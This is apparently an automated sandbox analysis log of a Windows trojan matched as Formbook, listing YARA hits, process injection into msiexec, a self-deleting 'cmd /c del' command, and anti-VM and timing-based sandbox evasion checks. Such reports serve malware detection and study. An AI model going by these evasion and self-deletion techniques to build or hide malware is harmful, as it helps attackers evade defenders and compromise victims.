          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A522AE
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A52EF7
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019A6E30
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F528EC
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EB20A0
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F520A8
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00E9B090
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F4D466
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F41002
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00E9841F
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00E9D5E0
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F525DD
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EB2581
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F51D55
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00E80D20
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EA4120
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00E8F900
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F52D07
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F52EF7
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F522AE
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EA6E30
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F51FF1
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F4DBD2
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EBEBB0
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F52B28
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001EB944
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001EBB84
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001D8C50
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001D8C4B
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001EBCF5
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001D2D90
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001EC5ED
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001D2FB0
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: String function: 0198B150 appears 35 times
          Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00E8B150 appears 35 times
          Source: g1EhgmCqCD.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: g1EhgmCqCD.exe | Binary or memory string: OriginalFilename vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000000.643686589.00000000005B2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameOnSerializedAttribute.exeB vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000002.667518282.0000000000CB0000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000002.673721469.00000000072E0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDSASignature.dll@ vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000002.672157538.0000000005AB0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameIEFRAME.DLLD vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000002.672229683.0000000005B30000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSimpleUI.dll( vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000001.00000002.675343588.0000000008E80000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe | Binary or memory string: OriginalFilename vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000003.00000000.665930767.0000000000E62000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameOnSerializedAttribute.exeB vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000003.00000002.736288628.000000000379F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemsiexec.exeX vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe, 00000003.00000002.728784074.0000000001A7F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs g1EhgmCqCD.exe
          Source: g1EhgmCqCD.exe | Binary or memory string: OriginalFilenameOnSerializedAttribute.exeB vs g1EhgmCqCD.exe
          Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
          Source: g1EhgmCqCD.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: g1EhgmCqCD.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@13/5
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\g1EhgmCqCD.exe.log
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_01
          Source: g1EhgmCqCD.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp | Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: g1EhgmCqCD.exe | Virustotal: Detection: 19%
          Source: g1EhgmCqCD.exe | ReversingLabs: Detection: 25%
          Source: unknown | Process created: C:\Users\user\Desktop\g1EhgmCqCD.exe 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Process created: C:\Users\user\Desktop\g1EhgmCqCD.exe C:\Users\user\Desktop\g1EhgmCqCD.exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Process created: C:\Users\user\Desktop\g1EhgmCqCD.exe C:\Users\user\Desktop\g1EhgmCqCD.exe
          Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\g1EhgmCqCD.exe'
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: g1EhgmCqCD.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: g1EhgmCqCD.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msiexec.pdb source: g1EhgmCqCD.exe, 00000003.00000002.736006293.0000000003790000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.689209294.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: g1EhgmCqCD.exe, 00000003.00000002.736006293.0000000003790000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: g1EhgmCqCD.exe, 00000003.00000002.728612173.0000000001960000.00000040.00000001.sdmp, msiexec.exe, 00000009.00000002.910212121.0000000000E60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: g1EhgmCqCD.exe, msiexec.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.689209294.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_04F7AE57 push 5D028C22h; ret
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_04F74E41 push eax; ret
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 1_2_04F7CF58 push eax; retf
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00415AFB push eax; iretd
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00414E3F push edx; retf
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_00415FF0 push es; iretd
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_019DD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_00EDD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E5AFB push eax; iretd
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EB3A5 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EB3FB push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EB3F2 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001EB45C push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E4E3F push edx; retf
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_001E5FF0 push es; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.63788106715
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara matchFile source: 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: g1EhgmCqCD.exe PID: 7100, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000001D85E4 second address: 00000000001D85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000001D896E second address: 00000000001D8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeCode function: 3_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe TID: 7144Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe TID: 7104Thread sleep time: -104000s >= -30000s
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exe TID: 7132Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6184Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 5660Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeThread delayed: delay time: 104000
          Source: C:\Users\user\Desktop\g1EhgmCqCD.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000004.00000000.698332601.000000000FCE8000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.686782958.0000000004710000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.921706000.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.693765738.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: g1EhgmCqCD.exe, 00000001.00000002.667933486.0000000002A62000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000004.00000002.922317177.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
